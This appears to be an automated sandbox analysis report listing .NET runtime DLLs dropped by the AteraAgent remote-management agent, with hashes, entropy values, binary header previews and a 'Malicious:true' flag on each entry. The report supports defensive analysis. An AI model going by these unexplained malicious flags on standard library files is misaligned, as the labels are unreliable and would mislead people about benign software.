                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............,... ...@....... ...............................+....@..................................,..O....@..................0(...`.......+............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................,......H........A...............?..h...t+......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*2r;..p.(....*2ro..p.(....*2r...p.(....*2r...p.(....*2r...p.(....*2rK..p.(....*2r...p.(....*2r...p.(....*2r...p.(....*2rM..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Contracts.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.8135579418002825
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:oRtRWjYW2Nyb8E9VF6IYinAM+oCIfRtED:CisEpYinAMxC7D
                                                                                                                                                                                                                                        MD5:15E2AA96A387B53B1195DC8B487E686A
                                                                                                                                                                                                                                        SHA1:9731DD11A7486D0715DFAC700C05E6CA94FDB0C6
                                                                                                                                                                                                                                        SHA-256:94131C844DD5B5563CB8459359819FFBF0725C6F1BD533350BF2A7EFF67673B2
                                                                                                                                                                                                                                        SHA-512:D4CC4E17F9FB116F244523F943CBC2FECDC76F7DC929632A2DE70444EC3459219C5A0EF57F860CC93CEB270267DEADE000E8040538EEB650A999507F36A6DEF3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............*... ...@....... ..............................D]....@.................................x*..O....@..@...............0(...`......@)............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................*......H.......P ..p....................(......................................BSJB............v4.0.30319......l...@...#~..........#Strings....H.......#US.L.......#GUID...\.......#Blob......................3..................................................-.....-.........M...........[.................'.....@.................[.....*...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.9...K.Y...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Debug.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.8943214940791755
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:YFxrIFWnoW5HBNyby2sE9jBF6IYiYF8pA5K+oCGUHFK1+JmWQTuB:oeWnoWXNyb8E9VF6IYinAM+oCG1+MlTQ
                                                                                                                                                                                                                                        MD5:261F2246AA5B2D82C261E6769DC07C17
                                                                                                                                                                                                                                        SHA1:7F2A8B7D7F91572197B7802D848FDBBF6859F691
                                                                                                                                                                                                                                        SHA-256:530B111070585C9BC8E0CE8E16B79E1D4E5D9D34FB8B220C4A1CD82EE704FC16
                                                                                                                                                                                                                                        SHA-512:DFE74576543A16A39834C26CCC1FA97A90DC52B7560D661B4C707CF9D0AC0889FDD75F87C769A8FFB2094BA1EC747CF14764382CA8832539617663F33A702704
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ...............................o....@.................................X)..O....@..$...............0(...`...... (............................................... ............... ..H............text........ ...................... ..`.rsrc...$....@......................@..@.reloc.......`......................@..B.................)......H.......P ..P....................'......................................BSJB............v4.0.30319......l.......#~..X.......#Strings....,.......#US.0.......#GUID...@.......#Blob......................3......................................K.........]...........d.............o...".o...?.o.....o...}.o.....o.....o.....o.....h...-.o.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.5...K.U...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.DiagnosticSource.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):99376
                                                                                                                                                                                                                                        Entropy (8bit):6.2372383902585335
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:qnDoXrtUaK/XIg+rZAXj8s9HaWt9LuOw9VHHV55aTwWbU7Hxl+xz:yitRK/XIgIZAXjD96WfLtGdM5bU4z
                                                                                                                                                                                                                                        MD5:D1BD4C35E7096B4D37A9E1D28F07B6D7
                                                                                                                                                                                                                                        SHA1:44C2DAD4FED91F42C528E2401DEE8FC4EFFBD642
                                                                                                                                                                                                                                        SHA-256:0D72569962DFCE056AF62C80C69CCD46938559D85632DB2EC51AD10792A84569
                                                                                                                                                                                                                                        SHA-512:68211D7E4FB53C75D1906BEB7D5CBD7C78414151B7D56FBF515922CA1529026B93DAA2FAEF4FD6136DB28E5423EE0D91D7E8935FB7A8856B4630103EDB9093D1
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v.#..........." ..0..R...........o... ........... ....................................`..................................o..O....................\..0(...........n..T............................................ ............... ..H............text....P... ...R.................. ..`.rsrc................T..............@..@.reloc...............Z..............@..B.................o......H.......4................e.. ....n........................................{'...*:.((.....}'...*..0..#........u......,.()....{'....{'...o*...*.*v ..yN )UU.Z()....{'...o+...X*....0..:........r...p......%..{'......%q.........-.&.+.......o,....(-...*..{....*:.((.....}....*....0..#........u......,.()....{.....{....o*...*.*v ..:. )UU.Z()....{....o+...X*....0..:........r-..p......%..{.......%q.........-.&.+.......o,....(-...*..{/...*..{0...*V.((.....}/.....}0...*.0..;........u......

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.FileVersionInfo.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.854870253306322
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:ExGxIZWJjW55NNyby2sE9jBF6IYiYF8pA5K+oCGUHFykqTB/c:E6oWJjWZNyb8E9VF6IYinAM+oCukiB0
                                                                                                                                                                                                                                        MD5:B9FB4621FAF445285157D22A7257FEA0
                                                                                                                                                                                                                                        SHA1:CFF35D37272E4723A2B201F1AA8323F1A6C48C00
                                                                                                                                                                                                                                        SHA-256:374BB9F514AA662F04156A1E7D5860F0A361873112280C816FD142C7C616FB8D
                                                                                                                                                                                                                                        SHA-512:C4C1D20A291E3800287E4D70A23201EB3310A755D54D373D7E61CA5ECA411E36C1604172BC2177F656099C0CD3D10192035A2499F49C31EE33A294EAE32891C5
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ..............................3.....@.................................H(..O....@..p...............0(...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B................|(......H.......P ..@....................&......................................BSJB............v4.0.30319......l...|...#~......(...#Strings............#US.........#GUID...$.......#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.$...C.?...K._...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Process.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.776479306655139
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Zqk53/hW3fZ+zW3Nyb8E9VF6IYinAM+oCjIysP:Zqk53MXEpYinAMxCQP
                                                                                                                                                                                                                                        MD5:7A1456584B0BAF903279B7D247BABB43
                                                                                                                                                                                                                                        SHA1:5762A8366ADE1F848D46498C46954173008A73AC
                                                                                                                                                                                                                                        SHA-256:7123B1F3DA6140B25AE2694392E2E0F5EF0A9CFA3992C335B994B24C2AD2EF6D
                                                                                                                                                                                                                                        SHA-512:EC29AC1C520D902C7EC1CA9D927B1C611B7B4421F5B8C17BFE741BA0B149CE3902A4294381806CF8A759DBA7D2415A1EEFD564A76463DB69ECF2F6C5A0C36296
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............**... ...@....... ..............................X:....@..................................)..O....@..0...............0(...`.......(............................................... ............... ..H............text...0.... ...................... ..`.rsrc...0....@......................@..@.reloc.......`......................@..B.................*......H.......P ...................... (......................................BSJB............v4.0.30319......l...$...#~..........#Strings............#US.........#GUID...........#Blob......................3............................................................j.q.........~.................}.....3.....L.................g.....P...................k.....k.....k...).k...1.k...9.k...A.k...I.k...Q.k...Y.k...a.k...i.k...q.k.......................#.....+.....3.....;.....C.7...K.W...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.StackTrace.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17968
                                                                                                                                                                                                                                        Entropy (8bit):6.662827631552611
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:TFCc4Y4OJWfOWqWWOWyNyb8E9VF6IYinAM+oCwOI7Mm:RCcyCCEpYinAMxCS5
                                                                                                                                                                                                                                        MD5:86A5C92C0527099B6377C148027695F4
                                                                                                                                                                                                                                        SHA1:11B5E8A412019AE590A1FD652C70BC6E72A97FAC
                                                                                                                                                                                                                                        SHA-256:3DF1788519270E0DDB46FD9ADA72372CAAA30D9D0D76063C10FFF8485F2BBEA1
                                                                                                                                                                                                                                        SHA-512:208395BE8A99CEE3ABC16D4DFB3CE9D8338CC1CA45CE4A694387F720EE5B2104F32647E883AD79F5C9171743EF11CDCB177D553C59703949922ED2DA06A58F84
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0.............N.... ...@....... ..............................TX....@..................................-..O....@..................0(...`......L-............................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................0.......H........ ..4....................,......................................F.(....~....(....*6.o.....(....*6.o..........**.o.......*.~....*.~....*.BSJB............v4.0.30319......l.......#~..<.......#Strings.... .......#US.(.......#GUID...8.......#Blob...........GU.........3..................................................8.........*.h...m.h.....Z.....$...........Z...+.|.....Z...1.Z.....$.....$.......3.D.......|...F.|...c.|.....|.....|.....|.....|.....|.....Z...I.|...}.Z.....Z.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.TextWriterTraceListener.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.8756333541081425
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:mlTx93aWxMW5VwNyby2sE9jBF6IYiYF8pA5K+oCGUHFwPtrnA3kF:OAWxMWANyb8E9VF6IYinAM+oCMPtrAM
                                                                                                                                                                                                                                        MD5:7654A03102D2347DC650BBB71AFA19B6
                                                                                                                                                                                                                                        SHA1:171A743C78312873B219B07D7A4BD7FE79D8E3D5
                                                                                                                                                                                                                                        SHA-256:9870BD7C4A414CFA489AE9376052EAD01E466F6830D0AC0CA25EA7C832C41287
                                                                                                                                                                                                                                        SHA-512:56922093636DA3FA7553410C046EF0BE8203561017EC37CAB8EEC7005E8C687570EEAE738386CDE2295C649AD2DFC9111F075E9137D1016E21391D914FED7BB6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ..............................;.....@..................................(..O....@..................0(...`......L'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P ..|....................&......................................BSJB............v4.0.30319......l.......#~......P...#Strings....D.......#US.H.......#GUID...X...$...#Blob......................3......................................z...........!...\.!...0.....A.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.,...C.G...K.g...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Tools.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.855800500607429
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:qYqArxbYWHaW5uiNyby2sE9jBF6IYiYF8pA5K+oCGUHF2zfxGLIDjG:oAlcWHaWBNyb8E9VF6IYinAM+oCyo6jG
                                                                                                                                                                                                                                        MD5:66B18072E7D73E62FD84672045F10393
                                                                                                                                                                                                                                        SHA1:0A38E8A91078136B0A1FB060F668A1D53E14A10F
                                                                                                                                                                                                                                        SHA-256:51CDE5B98E57EF67273033A76DB3D3BA0939A587A607E88FA40AEEA79B711417
                                                                                                                                                                                                                                        SHA-512:3C7B28D8E2A9A7F5B1FD72967BC2551DCDBDFA526F1CA85C37D6CAF9AEC5689DDECB8D9B04DA9B94C424262EFBE1A11D7901619137B494740A1320C47DD3DD0E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ...............................L....@..................................(..O....@.. ...............0(...`......d'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......|...#Strings....p.......#US.t.......#GUID...........#Blob......................3............................................................`.....1.....t.................s.....).....B.................].........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.5...K.U...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.TraceSource.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.779047335520254
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:uGIZnWlNWmNyb8E9VF6IYinAM+oCpcstae:rUyxEpYinAMxCPp
                                                                                                                                                                                                                                        MD5:014D304446EDC947EC60BB1A1CC2A2C2
                                                                                                                                                                                                                                        SHA1:BD2639F2A39506B0B9CFD83BA55E9E0A6797E64E
                                                                                                                                                                                                                                        SHA-256:994621C4143B78A5CBA907E7385FD3C64069811935D935FF0E5EE4830B960EB2
                                                                                                                                                                                                                                        SHA-512:6EDF9553F1AC9AC3259026733A4B58E8A390A0BF674B916CA3B63AEF3B27B2FCE5F0DD8687EF375E4A381C29874A761DA1F986133E5FBDA6DBA4F66DE984A594
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............2*... ...@....... ....................................@..................................)..O....@..P...............0(...`.......(............................................... ............... ..H............text...8.... ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................*......H.......P ......................((......................................BSJB............v4.0.30319......l...\...#~..........#Strings............#US.........#GUID...........#Blob......................3............................................................t...................................=.....V.................q.....Z...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Tracing.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25648
                                                                                                                                                                                                                                        Entropy (8bit):6.495579016953834
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:WlQnCMi33333333kj8xe+5PTYM3zUy+CezHjzgKj0uRWOdWmWJdW8Nyb8E9VF6IO:MQq33333333kX+TBi8rEpYinAMxC/r
                                                                                                                                                                                                                                        MD5:13AD2492EF144307BD62295000E7C617
                                                                                                                                                                                                                                        SHA1:246C63C5FDD16E2CE86D83A2591E7654F7E0897C
                                                                                                                                                                                                                                        SHA-256:08AD05026C272D6A1EC3F8C8775CC03C8210A98DC57CF011721F5AE90005CD17
                                                                                                                                                                                                                                        SHA-512:C94B5BFE999C52547F0499948C5E067455E2046F4E304E18679A53F3631A16CFD54473BE4E5183A5E10ED3C1529744276A24EB164C61A69020C6DC79D44768EF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0.............RM... ...`....... ...............................B....@..................................L..O....`..x............<..0(..........PL............................................... ............... ..H............text...X-... ...................... ..`.rsrc...x....`.......0..............@..@.reloc...............:..............@..B................3M......H.......8*...!...................K.......................................0..H........(.....-.r...ps....z.-.r...ps....z.(......}......(#...}.....{.....o....*"..(....*....0..Z.............%.r#..p.%..{.....%.rA..p.%..{..........%.rS..p.%..{....l.{....l[...ra..p(.....(....*&...{....*.0..4.................}......+....{.....".......X.....{.....i2.*.0..k..........{........{..........."....(.......X....{.....i.0%.(..........(.....(.......,..(........"....3.....}....*.......=..M......

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Drawing.Primitives.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.850005552827602
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:a28YFlXulWY/WnNyb8E9VF6IYinAM+oCKD9mN:a0q6EpYinAMxCz
                                                                                                                                                                                                                                        MD5:B34A2DA21F5F476FD93889AD2A4648F8
                                                                                                                                                                                                                                        SHA1:F0A866A4F09D38E880FDE0FB6EB07054BA26D1CD
                                                                                                                                                                                                                                        SHA-256:CBD05B0C1CD7CAF8162492BB38838DF090DA44114650F7F1254C41B7BF584A00
                                                                                                                                                                                                                                        SHA-512:DFB23B2B304F9A88333BCBD0AC8E820DF55AFB1205CDA8A484BAA779D9C4F07767B5AFEBF64C3F5A3BADF89C0A0AC1A1FBDCF196D92E3A4E860A8AF622080BD4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ...............................v....@..................................(..O....@.. ...............0(...`......t'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~..,...P...#Strings....|.......#US.........#GUID...........#Blob......................3......................................................~.....R..... .....f.................e...........4.....}...........O.....8...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.6...K.V...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Dynamic.Runtime.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16432
                                                                                                                                                                                                                                        Entropy (8bit):6.7278844961933855
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:+uMLcdQ5MW9MWBNyb8E9VF6IYinAM+oC394UE:DOcSpLEpYinAMxCnE
                                                                                                                                                                                                                                        MD5:DB4150E9A696E25DC123A77944961531
                                                                                                                                                                                                                                        SHA1:189D482C83909E889E519C385EEAC93177B3FE39
                                                                                                                                                                                                                                        SHA-256:33B63F824930EB98A889D477A3DD9D63D99E77CE375EA312783198DFF820CE52
                                                                                                                                                                                                                                        SHA-512:CDF82F087BB88097C7A6543A79D3A836685A249E1B548EAC3CFAAC440457C6A4C0599AD2A6C87F1EDD8B6D4B3CB1551F37FD1F0630BEC0A5FF93AA05CD476083
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............,... ...@....... ....................................@..................................+..O....@..................0(...`.......*............................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................,......H.......P .......................*......................................BSJB............v4.0.30319......l.......#~..p...0...#Strings............#US.........#GUID...........#Blob......................3................................................;.........................$.....$.....$.....$...[.$...t.$.....$.....$.........g.$.....#...........e.....e.....e...).e...1.e...9.e...A.e...I.e...Q.e...Y.e...a.e...i.e...q.e.......................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.Calendars.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.817416809900282
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:wZ7RqXWDRqlRqj0RqFWVNyb8E9VF6IYinAM+oCVacern:E9qKqjqjuqOEpYinAMxCwz
                                                                                                                                                                                                                                        MD5:FC18F7BD5DCE6188868A593297A49CB9
                                                                                                                                                                                                                                        SHA1:A456A5BA6F2001959B2F3B45681FBEF43787C648
                                                                                                                                                                                                                                        SHA-256:CB010ECC7CD90070E926B3C3104F8ECDB3A12CB16A75A43AD17E85A5475B4433
                                                                                                                                                                                                                                        SHA-512:E4AE55F293706C514F80139B50A9543BCFCC2C57547DE49DCDFF7138525F96532FFAA1AE938CCB731DCB309926F58F69152E78FDD0AE4DF34F10AC04CAB23D87
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............*... ...@....... ....................................@.................................X*..O....@..P...............0(...`...... )............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................*......H.......P ..P....................(......................................BSJB............v4.0.30319......l...L...#~......l...#Strings....$.......#US.(.......#GUID...8.......#Blob......................3......................................z...............\.....0.....%.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.Extensions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20016
                                                                                                                                                                                                                                        Entropy (8bit):6.628529042861803
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:/NBMbljRC+lgfS1RPWYR1Rw0R9WYRPWYRDRj0R9WSNyb8E9VF6IYinAM+oC3kNGJ:/vMhF2SzNzwu/NljuREpYinAMxCYc
                                                                                                                                                                                                                                        MD5:0A338CB89DE750A28B7A32505E756E1C
                                                                                                                                                                                                                                        SHA1:E8C91FB2ADC63DE4B95D9C7B77D2B6F13155A94D
                                                                                                                                                                                                                                        SHA-256:94AB5B19CD4006326DA38616D0F0FA38B7877996456FA6762FE6E63F2D3EEA28
                                                                                                                                                                                                                                        SHA-512:DA5EE2E05B4DF2D606E358A6F175C08D96070EAC583F98A2D14CED82859B6B8C6EDE98E78AFA44C0FC0C4B42FEC467789A68C50E19C7015F03EFF62C129790F0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............6... ...@....... ..............................]J....@.................................a6..O....@...............&..0(...`.......5............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................6......H........"..H............4......(5........................................o....*"..o....*..o....*"..o....*j~....%-.&(....s....%.....*..*.0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*......(....*...0..K........-.r1..ps....z. ...@3.(....*. ....3.(....*. ...._,.(....rI..ps..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
